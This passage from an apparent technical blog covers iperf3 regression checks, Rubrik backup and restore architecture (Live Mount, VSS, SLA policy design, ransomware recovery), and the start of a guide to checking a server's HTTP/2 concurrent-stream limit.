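A minimal regression gate built on that JSON (assuming a TCP run; end.sum_received.bits_per_second is the standard field in recent iperf3 versions, and the 5 Gbit/s baseline below is a hypothetical threshold):

import json

THRESHOLD_GBPS = 5.0  # hypothetical baseline for this link

with open("result.json") as f:
    result = json.load(f)

gbps = result["end"]["sum_received"]["bits_per_second"] / 1e9
print(f"measured {gbps:.2f} Gbit/s")
if gbps < THRESHOLD_GBPS:
    raise SystemExit(f"FAIL: below {THRESHOLD_GBPS} Gbit/s baseline")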

6. Common iperf3 Mistakes

  1. Testing from CPU-starved hosts
  2. Running tests too short
  3. Ignoring reverse tests
  4. Assuming TCP hides loss safely
  5. Forgetting MTU and MSS effects

7. Final Thoughts

iperf3 is deliberately simple.

That simplicity makes it dangerous to ignore.

If you don’t know what your network can do under controlled load, every performance discussion becomes opinion-driven theatre.


Why Rubrik’s Architecture Matters: When Restore, Not Backup, Is the Product

1. Backups Should Be Boring (and That Is the Point)

Backups are boring. They should be boring. A backup system that generates excitement is usually signalling failure.

The only time backups become interesting is when they are missing, and that interest level is lethal. Emergency bridges. Frozen change windows. Executive escalation. Media briefings. Regulatory apology letters. Engineers being asked questions that have no safe answers.

Most backup platforms are built for the boring days. Rubrik is designed for the day boredom ends.

2. Backup Is Not the Product. Restore Is.

Many organisations still evaluate backup platforms on the wrong metric: how fast they can copy data somewhere else.

That metric is irrelevant during an incident.

When things go wrong, the only questions that matter are:

  • What can I restore?
  • How fast can it be used?
  • How many restores can run in parallel?
  • How little additional infrastructure is required?

Rubrik treats restore as the primary product, not a secondary feature.

3. Architectural Starting Point: Designed for Failure, Not Demos

Rubrik was built without tape era assumptions. There is no central backup server, no serial job controller, and no media server bottleneck. Instead, it uses a distributed, scale out architecture with a global metadata index and a stateless policy engine.

Restore becomes a metadata lookup problem, not a job replay problem. This distinction is invisible in demos and decisive during outages.

4. Performance Metrics That Actually Matter

Backup throughput is easy to optimise and easy to market. Restore performance is constrained by network fan out, restore concurrency, control plane orchestration, and application host contention.

Rubrik addresses this by default through parallel restore streams, linear scaling with node count, and minimal control plane chatter. Restore performance becomes predictable rather than optimistic.

5. Restore Semantics That Match Reality

The real test of any backup platform is not how elegantly it captures data, but how usefully it returns that data when needed. This is where architectural decisions made years earlier either pay dividends or extract penalties.

5.1 Instant Access Instead of Full Rehydration

Rubrik does not require full data copy back before access. It supports live mount of virtual machines, database mounts directly from backup storage, and file system mounts for selective recovery.

The recovery model becomes access first, copy later if needed. This is the difference between minutes and hours when production is down.

5.2 Dropping a Table Should Not Be a Crisis

Rubrik understands databases as structured systems, not opaque blobs.

It supports table level restores for SQL Server, mounting a database backup as a live database, extracting tables or schemas without restoring the full database, and point in time recovery without rollback.

Accidental table drops should be operational annoyances, not existential threats.

5.3 Supported Database Engines

Rubrik provides native protection for the major enterprise database platforms:

| Database Engine | Live Mount | Point in Time Recovery | Key Constraints |
|---|---|---|---|
| Microsoft SQL Server | Yes | Yes (transaction log replay) | SQL 2012+ supported; Always On AG, FCI, standalone |
| Oracle Database | Yes | Yes (archive log replay) | RAC, Data Guard, Exadata supported; SPFILE required for automated recovery |
| SAP HANA | No | Yes | Backint API integration; uses native HANA backup scheduling |
| PostgreSQL | No | Yes (up to 5 minute RPO) | File level incremental; on premises and cloud (AWS, Azure, GCP) |
| IBM Db2 | Via Elastic App Service | Yes | Uses native Db2 backup utilities |
| MongoDB | Via Elastic App Service | Yes | Sharded and unsharded clusters; no quiescing required |
| MySQL | Via Elastic App Service | Yes | Uses native MySQL backup tools |
| Cassandra | Via Elastic App Service | Yes | Via Rubrik Datos IO integration |

The distinction between native integration and Elastic App Service matters operationally. Native integration means Rubrik handles discovery, scheduling, and orchestration directly. Elastic App Service means Rubrik provides managed volumes as backup targets while the database’s native tools handle the actual backup process. Both approaches deliver immutability and policy driven retention, but the operational experience differs.

5.4 Live Mount: Constraints and Caveats

Live Mount is Rubrik’s signature capability: mounting backups as live, queryable databases without copying data back to production storage. The database runs with its data files served directly from the Rubrik cluster over NFS (for Oracle) or SMB 3.0 (for SQL Server).

This capability is transformative for specific use cases. It is not a replacement for production storage.

What Live Mount Delivers:

  • Near instant database availability (seconds to minutes, regardless of database size)
  • Zero storage provisioning on the target host
  • Multiple concurrent mounts from the same backup
  • Point in time access across the entire retention window
  • Ideal for granular recovery, DBCC health checks, test/dev cloning, audit queries, and upgrade validation

What Live Mount Does Not Deliver:

  • Production grade I/O performance
  • High availability during Rubrik cluster maintenance
  • Persistence across host or cluster reboots

IOPS Constraints:

Live Mount performance is bounded by the Rubrik appliance’s ability to serve I/O, not by the target host’s storage subsystem. Published figures suggest approximately 30,000 IOPS per Rubrik appliance for Live Mount workloads. This is adequate for reporting queries, data extraction, and validation testing. It is not adequate for transaction heavy production workloads.

The performance characteristics are inherently different from production storage:

| Metric | Production SAN/Flash | Rubrik Live Mount |
|---|---|---|
| Random read IOPS | 100,000+ | ~30,000 per appliance |
| Latency profile | Sub millisecond | Network + NFS overhead |
| Write optimisation | Production tuned | Backup optimised |
| Concurrent workloads | Designed for contention | Shared with backup operations |

SQL Server Live Mount Specifics:

  • Databases mount via SMB 3.0 shares with UNC paths
  • Transaction log replay occurs during mount for point in time positioning
  • The mounted database is read write, but writes go to the Rubrik cluster
  • Supported for standalone instances, Failover Cluster Instances, and Always On Availability Groups
  • Table level recovery requires mounting the database, then using T SQL to extract and import specific objects

Oracle Live Mount Specifics:

  • Data files mount via NFS; redo logs and control files remain on the target host
  • Automated recovery requires source and target configurations to match (RAC to RAC, single instance to single instance, ASM to ASM)
  • Files only recovery allows dissimilar configurations but requires DBA managed RMAN recovery
  • SPFILE is required for automated recovery; PFILE databases require manual intervention
  • Block change tracking (BCT) is disabled on Live Mount targets
  • Live Mount fails if the target host, RAC cluster, or Rubrik cluster reboots during the mount, requiring a forced unmount to clean up metadata
  • Direct NFS (DNFS) is recommended on Oracle RAC nodes for improved recovery performance

What Live Mount Is Not:

Live Mount is explicitly designed for temporary access, not sustained production workloads. The use cases Rubrik markets (test/dev, DBCC validation, granular recovery, audit queries) all share a common characteristic: they are time bounded operations that tolerate moderate I/O performance in exchange for instant availability.

Running production transaction processing against a Live Mount database would be technically possible and operationally inadvisable. The I/O profile, the network dependency, and the lack of high availability guarantees make it unsuitable for workloads where performance and uptime matter.

5.5 The Recovery Hierarchy

Understanding when to use each recovery method matters:

| Recovery Need | Recommended Method | Time to Access | Storage Required |
|---|---|---|---|
| Extract specific rows/tables | Live Mount + query | Minutes | None |
| Validate backup integrity | Live Mount + DBCC | Minutes | None |
| Clone for test/dev | Live Mount | Minutes | None |
| Full database replacement | Export/Restore | Hours (size dependent) | Full database size |
| Disaster recovery cutover | Instant Recovery | Minutes (then migrate) | Temporary, then full |

The strategic value of Live Mount is avoiding full restores when full restores are unnecessary. For a 5TB database where someone dropped a single table, Live Mount means extracting that table in minutes rather than waiting hours for a complete restore.

For actual disaster recovery, where the production database is gone and must be replaced, Live Mount provides bridge access while the full restore completes in parallel. The database is queryable immediately; production grade performance follows once data migration finishes.

6. Why Logical Streaming Is a Design Failure

Traditional restore models stream backup data through the database host. This guarantees CPU contention, IO pressure, and restore times proportional to database size rather than change size.

Figure 1 illustrates this contrast clearly. Traditional restore requires data to be copied back through the database server, creating high I/O, CPU and network load with correspondingly long restore times. Rubrik’s Live Mount approach mounts the backup copy directly, achieving near zero RTO with minimal data movement. The difference between these approaches becomes decisive when production is down and every minute of restore time translates to business impact.

Rubrik avoids this by mounting database images and extracting only required objects. The database host stops being collateral damage during recovery.

6.1 The VSS Tax: Why SQL Server Backups Cannot Escape Application Coordination

For VMware workloads without databases, Rubrik can leverage storage level snapshots that are instantaneous, application agnostic, and impose zero load on the guest operating system. The hypervisor freezes the VM state, the storage array captures the point in time image, and the backup completes before the application notices.

SQL Server cannot offer this simplicity. The reason is not a Microsoft limitation or a Rubrik constraint. The reason is transactional consistency.

6.1.1 The Crash Consistent Option Exists

Nothing technically prevents Rubrik, or any backup tool, from taking a pure storage snapshot of a SQL Server volume without application coordination. The snapshot would complete in milliseconds with zero database load.

The problem is what you would recover: a crash consistent image, not an application consistent one.

A crash consistent snapshot captures storage state mid flight. This includes partially written pages, uncommitted transactions, dirty buffers not yet flushed to disk, and potentially torn writes caught mid I/O. SQL Server is designed to recover from exactly this state. Every time the database engine starts after an unexpected shutdown, it runs crash recovery, rolling forward committed transactions from the log and rolling back uncommitted ones.

The database will become consistent. Eventually. Probably.

6.1.2 Why Probably Is Not Good Enough

Crash recovery works. It works reliably. It is tested millions of times daily across every SQL Server instance that experiences an unclean shutdown.

But restore confidence matters. When production is down and executives are asking questions, the difference between “this backup is guaranteed consistent” and “this backup should recover correctly after crash recovery completes” is operationally significant.

VSS exists to eliminate that uncertainty.

6.1.3 What VSS Actually Does

When a backup application requests an application consistent SQL Server snapshot, the sequence shown in Figure 2 executes. The backup server sends a signal through VSS Orchestration, which triggers the SQL Server VSS Writer to prepare the database. This preparation involves flushing dirty pages to storage, hardening transaction logs, and momentarily freezing I/O. Only then does the storage-level snapshot execute, capturing a point-in-time consistent image that requires no crash recovery on restore.

The result is a snapshot that requires no crash recovery on restore. The database is immediately consistent, immediately usable, and carries no uncertainty about transactional integrity.

6.1.4 The Coordination Cost

The VSS freeze window is typically brief, milliseconds to low seconds. But the preparation is not free.

Buffer pool flushes on large databases generate I/O pressure. Checkpoint operations compete with production workloads. The freeze, however short, introduces latency for in flight transactions. The database instance is actively participating in its own backup.

For databases measured in terabytes, with buffer pools consuming hundreds of gigabytes, this coordination overhead becomes operationally visible. Backup windows that appear instantaneous from the storage console are hiding real work inside the SQL Server instance.

6.1.5 The Architectural Asymmetry

This creates a fundamental difference in backup elegance across workload types:

| Workload Type | Backup Method | Application Load | Restore State |
|---|---|---|---|
| VMware VM (no database) | Storage snapshot | Zero | Crash consistent (acceptable) |
| VMware VM (with SQL Server) | VSS coordinated snapshot | Moderate | Application consistent |
| Physical SQL Server | VSS coordinated snapshot | Moderate to high | Application consistent |
| Physical SQL Server | Pure storage snapshot | Zero | Crash consistent (risky) |

For a web server or file share, crash consistent is fine. The application has no transactional state worth protecting. For a database, crash consistent means trusting recovery logic rather than guaranteeing consistency.

6.1.6 The Uncomfortable Reality

The largest, most critical SQL Server databases, the ones that would benefit most from zero overhead instantaneous backup, are precisely the workloads where crash consistent snapshots carry the most risk. More transactions in flight. Larger buffer pools. More recovery time if something needs replay.

Rubrik supports VSS coordination because the alternative is shipping backups that might need crash recovery. That uncertainty is acceptable for test environments. It is rarely acceptable for production databases backing financial systems, customer records, or regulatory reporting.

The VSS tax is not a limitation imposed by Microsoft or avoided by competitors. It is the cost of consistency. Every backup platform that claims application consistent SQL Server protection is paying it. The only question is whether they admit the overhead exists.

7. Snapshot Based Protection Is Objectively Better (When You Can Get It)

The previous section explained why SQL Server backups cannot escape application coordination. VSS exists because transactional consistency requires it, and the coordination overhead is the price of certainty.

This makes the contrast with pure snapshot based protection even starker. Where snapshots work cleanly, they are not incrementally better. They are categorically superior.

7.1 What Pure Snapshots Deliver

Snapshot based backups in environments that support them provide:

  • Near instant capture: microseconds to milliseconds, regardless of dataset size
  • Zero application load: the workload never knows a backup occurred
  • Consistent recovery points: the storage layer guarantees point in time consistency
  • Predictable backup windows: duration is independent of data volume
  • No bandwidth consumption during capture: data movement happens later, asynchronously

A 50TB VMware datastore snapshots in the same time as a 50GB datastore. Backup windows become scheduling decisions rather than capacity constraints.

Rubrik exploits this deeply in VMware environments. Snapshot orchestration, instant VM recovery, and live mounts all depend on the hypervisor providing clean, consistent, zero overhead capture points.

7.2 Why This Is Harder Than It Looks

The elegance of snapshot based protection depends entirely on the underlying platform providing the right primitives. This is where the gap between VMware and everything else becomes painful.

VMware offers:

  • Native snapshot APIs with transactional semantics
  • Changed Block Tracking (CBT) for efficient incrementals
  • Hypervisor level consistency without guest coordination
  • Storage integration through VADP (vSphere APIs for Data Protection)

These are not accidental features. VMware invested years building a backup ecosystem because they understood that enterprise adoption required operational maturity, not just compute virtualisation.

Physical hosts offer none of this.

There is no universal snapshot API for bare metal servers. Storage arrays provide snapshot capabilities, but each vendor implements them differently, with different consistency guarantees, different integration points, and different failure modes. The operating system has no standard mechanism to coordinate application state with storage level capture.

7.3 The Physical Host Penalty

This is why physical SQL Server hosts face a compounding disadvantage:

  1. No hypervisor abstraction: there is no layer between the OS and storage that can freeze state cleanly
  2. VSS remains mandatory: application consistency still requires database coordination
  3. No standardised incremental tracking: without CBT or equivalent, every backup must rediscover what changed
  4. Storage integration is bespoke: each array, each SAN, each configuration requires specific handling

The result is that physical hosts with the largest databases (the workloads generating the most backup data, with the longest restore times, under the most operational pressure) receive the least architectural benefit from modern backup platforms.

They are stuck paying the VSS tax without receiving the snapshot dividend.

7.4 The Integration Hierarchy

Backup elegance follows a clear hierarchy based on platform integration depth:

| Environment | Snapshot Quality | Incremental Efficiency | Application Consistency | Overall Experience |
|---|---|---|---|---|
| VMware (no database) | Excellent | CBT driven | Not required | Seamless |
| VMware (with SQL Server) | Excellent | CBT driven | VSS coordinated | Good with overhead |
| Cloud native (EBS, managed disks) | Good | Provider dependent | Varies by workload | Generally clean |
| Physical with enterprise SAN | Possible | Array dependent | VSS coordinated | Complex but workable |
| Physical with commodity storage | Limited | Often full scan | VSS coordinated | Painful |

The further down this hierarchy, the more the backup platform must compensate for missing primitives. Rubrik handles this better than most, but even excellent software cannot conjure APIs that do not exist.

7.5 Why the Industry Irony Persists

The uncomfortable truth is that snapshot based protection delivers its greatest value precisely where it is least available.

A 500GB VMware VM snapshots effortlessly. The hypervisor provides everything needed. Backup is boring, as it should be.

A 50TB physical SQL Server, the database actually keeping the business running, containing years of transactional history, backing regulatory reporting and financial reconciliation, must coordinate through VSS, flush terabytes of buffer pool, sustain I/O pressure during capture, and hope the storage layer cooperates.

The workloads that need snapshot elegance the most are architecturally prevented from receiving it.

This is not a Rubrik limitation. It is not a Microsoft conspiracy. It is the accumulated consequence of decades of infrastructure evolution where virtualisation received backup investment and physical infrastructure did not.

7.6 What This Means for Architecture Decisions

Understanding this hierarchy should influence infrastructure strategy:

Virtualise where possible. The backup benefits alone often justify the overhead. A SQL Server VM with VSS coordination still benefits from CBT, instant recovery, and hypervisor level orchestration.

Choose storage with snapshot maturity. If physical hosts are unavoidable, enterprise arrays with proven snapshot integration reduce the backup penalty. This is not the place for commodity storage experimentation.

Accept the VSS overhead. For SQL Server workloads, crash consistent snapshots are technically possible but operationally risky. The coordination cost is worth paying. Budget for it in backup windows and I/O capacity.

Plan restore, not backup. Snapshot speed is irrelevant if restore requires hours of data rehydration. The architectural advantage of snapshots extends to recovery only if the platform supports instant mount and selective restore.

Rubrik’s value in this landscape is not eliminating the integration gaps (nobody can) but navigating them intelligently. Where snapshots work, Rubrik exploits them fully. Where they do not, Rubrik minimises the penalty through parallel restore, live mounts, and metadata driven recovery.

The goal remains the same: make restore the product, regardless of how constrained the backup capture had to be.

8. Rubrik Restore Policies: Strategy, Trade offs, and Gotchas

SLA Domains are Rubrik’s policy abstraction layer, and understanding how to configure them properly separates smooth recoveries from painful ones. The flexibility is substantial, but so are the consequences of misconfiguration.

8.1 Understanding SLA Domain Architecture

Rubrik’s policy model centres on SLA Domains, named policies that define retention, frequency, replication, and archival behaviour. Objects are assigned to SLA Domains rather than configured individually, which creates operational leverage but requires upfront design discipline.

The core parameters that matter for restore planning:

Snapshot Frequency determines your Recovery Point Objective (RPO). A 4-hour frequency means you could lose up to 4 hours of data. For SQL Server with log backup enabled, transaction logs between snapshots reduce effective RPO to minutes, but the full snapshot frequency still determines how quickly you can access a baseline restore point.

Local Retention controls how many snapshots remain on the Rubrik cluster for instant access. This is your Live Mount window. Data within local retention restores in minutes. Data beyond it requires rehydration from archive, which takes hours.

Replication copies snapshots to a secondary Rubrik cluster, typically in another location. This is your disaster recovery tier. Replication targets can serve Live Mount operations, meaning DR isn’t just “eventually consistent backup copies” but actual instant recovery capability at the secondary site.

Archival moves aged snapshots to object storage (S3, Azure Blob, Google Cloud Storage). Archive tier data cannot be Live Mounted, it must be retrieved first, which introduces retrieval latency and potentially egress costs.
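
Pulling those four levers together, a policy can be thought of as a small record like the following (illustrative Python only; the field names are hypothetical and not Rubrik's API):

# A "Gold" tier SLA Domain as described above; names are illustrative
GOLD_SLA = {
    "snapshot_frequency_hours": 8,      # drives the baseline RPO
    "local_retention_days": 14,         # the Live Mount window
    "replication": {"target": "dr-cluster", "mode": "async"},
    "archival": {"target": "object-storage", "after_days": 14},
}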

8.2 The Retention vs. Recovery Speed Trade off

This is where most organisations get the policy design wrong.

The temptation is to keep minimal local retention and archive aggressively to reduce storage costs. The consequence is that any restore request older than a few days becomes a multi hour operation.

Consider the mathematics for a 5TB SQL Server database:

| Recovery Scenario | Local Retention | Time to Access | Operational Impact |
|---|---|---|---|
| Yesterday’s backup | Within local retention | 2-5 minutes (Live Mount) | Minimal |
| Last week’s backup | Within local retention | 2-5 minutes (Live Mount) | Minimal |
| Last month’s backup | Archived | 4-8 hours (retrieval + restore) | Significant |
| Last quarter’s backup | Archived (cold tier) | 12-24 hours | Major incident |

The storage cost of keeping 30 days local versus 7 days local might seem significant when multiplied across the estate. But the operational cost of a 6 hour restore delay during an audit request or compliance investigation often exceeds years of incremental storage spend.

Recommendation: Size local retention to cover your realistic recovery scenarios, not your theoretical minimum. For most organisations, 14-30 days of local retention provides the right balance between cost and operational flexibility.
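
To make the trade off concrete, a back of envelope comparison (every figure below is a placeholder; substitute your own storage pricing and outage costs):

# Hypothetical numbers throughout; adjust for your environment
DB_TB = 5
DAILY_CHANGE_RATE = 0.03            # assumed 3% daily change
STORAGE_COST_TB_MONTH = 25.0        # assumed $/TB/month on cluster
OUTAGE_COST_PER_HOUR = 10_000.0     # assumed business cost of waiting

def extra_storage_cost_per_year(extra_days):
    extra_tb = DB_TB * DAILY_CHANGE_RATE * extra_days
    return extra_tb * STORAGE_COST_TB_MONTH * 12

# Extending local retention from 7 to 30 days...
storage = extra_storage_cost_per_year(30 - 7)
# ...versus one archive retrieval avoided (~6 h of restore delay):
delay = 6 * OUTAGE_COST_PER_HOUR
print(f"extra storage/year: ${storage:,.0f}  vs  one delayed restore: ${delay:,.0f}")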

8.3 SLA Domain Design Patterns

8.3.1 Pattern 1: Tiered by Criticality

Create separate SLA Domains for different criticality levels:

  • Platinum: 4 hour snapshots, 30 day local retention, synchronous replication, 7 year archive
  • Gold: 8 hour snapshots, 14 day local retention, asynchronous replication, 3 year archive
  • Silver: Daily snapshots, 7 day local retention, no replication, 1 year archive
  • Bronze: Daily snapshots, 7 day local retention, no replication, 90 day archive

This pattern works well when criticality maps cleanly to workload types, but creates governance overhead when applications span tiers.

8.3.2 Pattern 2: Tiered by Recovery Requirements

Align SLA Domains to recovery time objectives rather than business criticality:

  • Instant Recovery: Maximum local retention, synchronous replication, Live Mount always available
  • Same Day Recovery: 14 day local retention, asynchronous replication
  • Next Day Recovery: 7 day local retention, archive first strategy

This pattern acknowledges that “critical” and “needs instant recovery” aren’t always the same thing. A compliance archive might be business critical but tolerate 24 hour recovery times.

8.3.3 Pattern 3: Application Aligned

Create SLA Domains per major application or database platform:

  • SQL Server Production
  • SQL Server Non Production
  • Oracle Production
  • VMware Infrastructure
  • File Shares

This pattern simplifies troubleshooting and reporting but can lead to policy sprawl as the estate grows.

8.4 Log Backup Policies: The Hidden Complexity

For SQL Server and Oracle, snapshot frequency alone doesn’t tell the full story. Transaction log backups between snapshots determine actual RPO.

Rubrik supports log backup frequencies down to 1 minute for SQL Server. The trade offs:

Aggressive Log Backup (1-5 minute frequency):

  • Sub 5 minute RPO
  • Higher metadata overhead on Rubrik cluster
  • More objects to manage during restore
  • Longer Live Mount preparation time (more logs to replay)

Conservative Log Backup (15-60 minute frequency):

  • Acceptable RPO for most workloads
  • Lower operational overhead
  • Faster Live Mount operations
  • Simpler troubleshooting

Gotcha: Log backup frequency creates a hidden I/O load on the source database. A 1 minute log backup interval on a high transaction database generates constant log backup traffic. For already I/O constrained databases, this can become the straw that breaks performance.

Recommendation: Match log backup frequency to actual RPO requirements, not aspirational ones. If the business can tolerate 15 minutes of data loss, don’t configure 1 minute log backups just because you can.

8.5 Replication Topology Gotchas

Replication seems straightforward: copy snapshots to another cluster. But the implementation details matter.

8.5.1 Gotcha 1: Replication Lag Under Load

Asynchronous replication means the target cluster is always behind the source. During high backup activity (month end processing, batch loads), this lag can extend to hours. If a disaster occurs during this window, you lose more data than your SLA suggests.

Monitor replication lag as an operational metric, not just a capacity planning number.

8.5.2 Gotcha 2: Bandwidth Contention with Production Traffic

Replication competes for the same network paths as production traffic. If your backup replication saturates a WAN link, production application performance degrades.

Either implement QoS policies to protect production traffic, or schedule replication during low utilisation windows. Rubrik supports replication scheduling, but the default is “as fast as possible,” which isn’t always appropriate.

8.5.3 Gotcha 3: Cascaded Replication Complexity

For multi site architectures, you might configure Site A → Site B → Site C replication. Each hop adds latency and failure modes. A Site B outage breaks the chain to Site C.

Consider whether hub and spoke (Site A replicates independently to both B and C) better matches your DR requirements, despite the additional bandwidth consumption.

8.6 Archive Tier Selection: Retrieval Time Matters

Object storage isn’t monolithic. The choice between storage classes has direct recovery implications.

Storage Class                 | Typical Retrieval Time            | Use Case
S3 Standard / Azure Hot       | Immediate                         | Frequently accessed archives
S3 Standard-IA / Azure Cool   | Immediate (higher retrieval cost) | Infrequent but urgent access
S3 Glacier Instant Retrieval  | Milliseconds                      | Compliance archives with occasional audit access
S3 Glacier Flexible Retrieval | 1-12 hours                        | Long-term retention with rare access
S3 Glacier Deep Archive       | 12-48 hours                       | Legal hold; never accessed unless subpoenaed

Gotcha: Rubrik’s archive policy assigns snapshots to a single storage class. If your retention spans 7 years, all 7 years of archives pay the same storage rate, even though year 1 archives are accessed far more frequently than year 7 archives.

Recommendation: Consider tiered archive policies, with recent archives in Standard-IA and aged archives in Glacier. This requires multiple SLA Domains and careful lifecycle management, but the cost savings compound significantly at scale.
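
A rough sketch of why the savings compound, using assumed per TB month prices rather than quoted cloud rates:

archive_tb = 100
months_total = 84                  # 7 year retention

single_class_price = 12.5          # assumed: everything in Standard-IA
tiered = [(12, 12.5), (72, 3.6)]   # assumed: year 1 in IA, years 2-7 in Glacier

single_cost = archive_tb * single_class_price * months_total
tiered_cost = sum(archive_tb * price * months for months, price in tiered)

print(f"Single class, 7 years: ${single_cost:,.0f}")
print(f"Tiered, 7 years:       ${tiered_cost:,.0f}")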

8.7 Policy Assignment Gotchas

8.7.1 Gotcha 1: Inheritance and Override Conflicts

Rubrik supports hierarchical policy assignment (cluster → host → database). When policies conflict, the resolution logic isn’t always intuitive. A database with an explicit SLA assignment won’t inherit changes made to its parent host’s policy.

Document your policy hierarchy explicitly. During audits, the question “what policy actually applies to this database?” should have an immediate, verifiable answer.
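
The resolution rule is worth encoding in whatever runbook or tooling you use. A minimal sketch of “explicit assignment beats inheritance”; the structure is illustrative, not Rubrik’s data model:

# Walk db -> host -> cluster; the first explicit assignment wins.
assignments = {
    "cluster": "Gold",
    "host":    None,        # inherits from cluster
    "db":      "Platinum",  # explicit: will NOT follow later host changes
}

def effective_sla() -> str:
    for level in ("db", "host", "cluster"):
        sla = assignments[level]
        if sla is not None:
            return f"{sla} (explicitly set at {level})"
    return "unprotected"

print(effective_sla())  # -> Platinum (explicitly set at db)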

8.7.2 Gotcha 2: Pre script and Post script Failures

Custom scripts for application quiescing or notification can fail, and failure handling varies. A pre script failure might skip the backup entirely (safe but creates a gap) or proceed without proper quiescing (dangerous).

Test script failure modes explicitly. Know what happens when your notification webhook is unreachable or your custom quiesce script times out.

8.7.3 Gotcha 3: Time Zone Confusion

Rubrik displays times in the cluster’s configured time zone, but SLA schedules operate in UTC unless explicitly configured otherwise. An “8 PM backup” might run at midnight local time if the time zone mapping is wrong.

Verify backup execution times after policy configuration; don’t trust the schedule display alone.

8.8 Testing Your Restore Policies

Policy design is theoretical until tested. The following tests should be regular operational practice:

Live Mount Validation: Mount a backup from local retention and verify application functionality. This proves both backup integrity and Live Mount operational capability.

Archive Retrieval Test: Retrieve a backup from archive tier and time the operation. Compare actual retrieval time against SLA commitments.

Replication Failover Test: Perform a Live Mount from the replication target, not the source cluster. This validates that DR actually works, not just that replication is running.

Point in Time Recovery Test: For databases with log backup enabled, recover to a specific timestamp between snapshots. This validates that log chain integrity is maintained.

Concurrent Restore Test: Simulate a ransomware scenario by triggering multiple simultaneous restores. Measure whether your infrastructure can sustain the required parallelism.

8.9 Policy Review Triggers

SLA Domains shouldn’t be “set and forget.” Trigger policy reviews when:

  • Application criticality changes (promotion to production, decommissioning)
  • Recovery requirements change (new compliance mandates, audit findings)
  • Infrastructure changes (new replication targets, storage tier availability)
  • Performance issues emerge (backup windows exceeded, replication lag growing)
  • Cost optimisation cycles (storage spend review, cloud egress analysis)

The goal is proactive policy maintenance, not reactive incident response when a restore takes longer than expected.

9. Ransomware: Where Architecture Is Exposed

9.1 The Restore Storm Problem

After ransomware, the challenge is not backup availability. The challenge is restoring everything at once.

Constraints appear immediately. East-west traffic saturates. DWDM links run hot. Core switch buffers overflow. Cloud egress throttling kicks in.

Rubrik mitigates this through parallel restores, SLA based prioritisation, and live mounts for critical systems. What it cannot do is defeat physics. A good recovery plan avoids turning a data breach into a network outage.
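
The physics is simple division. A sketch with assumed numbers shows why a restore storm is a bandwidth problem before it is a backup problem:

dataset_tb = 200        # assumed total data to restore after the incident
link_gbps = 10          # assumed shared east-west / DWDM capacity
efficiency = 0.6        # assumed overhead plus competing production traffic

usable_gbps = link_gbps * efficiency
hours = (dataset_tb * 8 * 1000) / (usable_gbps * 3600)
print(f"~{hours:.0f} hours to move {dataset_tb} TB at {usable_gbps:.0f} Gb/s usable")
# ~74 hours: parallelism and prioritisation change the order, not the total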

10. SaaS vs Appliance: This Is a Network Decision

Functionally, Rubrik SaaS and on prem appliances share the same policy engine, metadata index, and restore semantics.

The difference is bandwidth reality.

On prem appliances provide fast local restores, predictable latency, and minimal WAN dependency. SaaS based protection provides excellent cloud workload coverage and operational simplicity, but restore speed is bounded by network capacity and egress costs.

Hybrid estates usually require both.

11. Why Rubrik in the Cloud?

Cloud providers offer native backup primitives. These are necessary but insufficient. They do not provide unified policy across environments, cross account recovery at scale, ransomware intelligence, or consistent restore semantics. Rubrik turns cloud backups into recoverable systems rather than isolated snapshots.

11.1 Should You Protect Your AWS Root and Crypto Accounts?

Yes, because losing the control plane is worse than losing data.

Rubrik protects IAM configuration, account state, and infrastructure metadata. After a compromise, restoring how the account was configured is as important as restoring the data itself.

12. Backup Meets Security (Finally)

Rubrik integrates threat awareness into recovery using entropy analysis, change rate anomaly detection, and snapshot divergence tracking. This answers the most dangerous question in recovery: which backup is actually safe to restore? Most platforms cannot answer this with confidence.

13. VMware First Class Citizen, Physical Hosts Still Lag

Rubrik’s deepest integrations exist in VMware environments, including snapshot orchestration, instant VM recovery, and live mounts.

The uncomfortable reality remains that physical hosts with the largest datasets would benefit most from snapshot based protection, yet receive the least integration. This is an industry gap, not just a tooling one.

14. When Rubrik Is Not the Right Tool

Rubrik is not universal.

It is less optimal when bandwidth is severely constrained, estates are very small, or tape workflows are legally mandated.

Rubrik’s value emerges at scale, under pressure, and during failure.

15. Conclusion: Boredom Is Success

Backups should be boring. Restores should be quiet. Executives should never know the platform exists.

The only time backups become exciting is when they fail, and that excitement is almost always lethal.

Rubrik is not interesting because it stores data. It is interesting because, when everything is already on fire, restore remains a controlled engineering exercise rather than a panic response.


Testing Maximum HTTP/2 Concurrent Streams for Your Website

1. Introduction

Understanding and testing your server’s maximum concurrent stream configuration is critical for both performance tuning and security hardening against HTTP/2 attacks. This guide provides comprehensive tools and techniques to test the SETTINGS_MAX_CONCURRENT_STREAMS parameter on your web servers.

This article complements our previous guide on Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from macOS. While that article focuses on the CVE-2023-44487 Rapid Reset attack, this guide helps you verify that your server properly enforces stream limits, which is a critical defense mechanism.

2. Why Test Stream Limits?

The SETTINGS_MAX_CONCURRENT_STREAMS setting determines how many concurrent requests a client can multiplex over a single HTTP/2 connection. Testing this limit is important because:

  1. Security validation: Confirms your server enforces reasonable stream limits
  2. Configuration verification: Ensures your settings match security recommendations (typically 100-128 streams)
  3. Performance tuning: Helps optimize the balance between throughput and resource consumption
  4. Attack surface assessment: Identifies if servers accept dangerously high stream counts

3. Understanding HTTP/2 Stream Limits

When an HTTP/2 connection is established, the server sends a SETTINGS frame that includes:

SETTINGS_MAX_CONCURRENT_STREAMS: 100

This tells the client the maximum number of concurrent streams allowed. A compliant client should respect this limit, but attackers will not.
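
You can read that advertised value yourself with a few lines of the same h2 library used by the full tester below. A minimal sketch, assuming the server’s initial SETTINGS frame arrives in the first read and that the host (example.com here) supports HTTP/2:

import socket
import ssl

from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RemoteSettingsChanged
from h2.settings import SettingCodes

host = "example.com"  # substitute a host you are authorized to test

ctx = ssl.create_default_context()
ctx.set_alpn_protocols(["h2"])
sock = ctx.wrap_socket(socket.create_connection((host, 443), timeout=10),
                       server_hostname=host)

conn = H2Connection(H2Configuration(client_side=True))
conn.initiate_connection()
sock.sendall(conn.data_to_send())

# The server's connection preface normally carries its SETTINGS frame
for event in conn.receive_data(sock.recv(65536)):
    if isinstance(event, RemoteSettingsChanged):
        changed = event.changed_settings.get(SettingCodes.MAX_CONCURRENT_STREAMS)
        if changed:
            print(f"Advertised max concurrent streams: {changed.new_value}")
sock.close()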

3.1. Common Default Values

Web Servers:

  • Nginx: 128 (configurable via http2_max_concurrent_streams)
  • Apache: 100 (configurable via H2MaxSessionStreams)
  • Caddy: 250 (configurable via max_concurrent_streams)
  • LiteSpeed: 100 (configurable in admin panel)

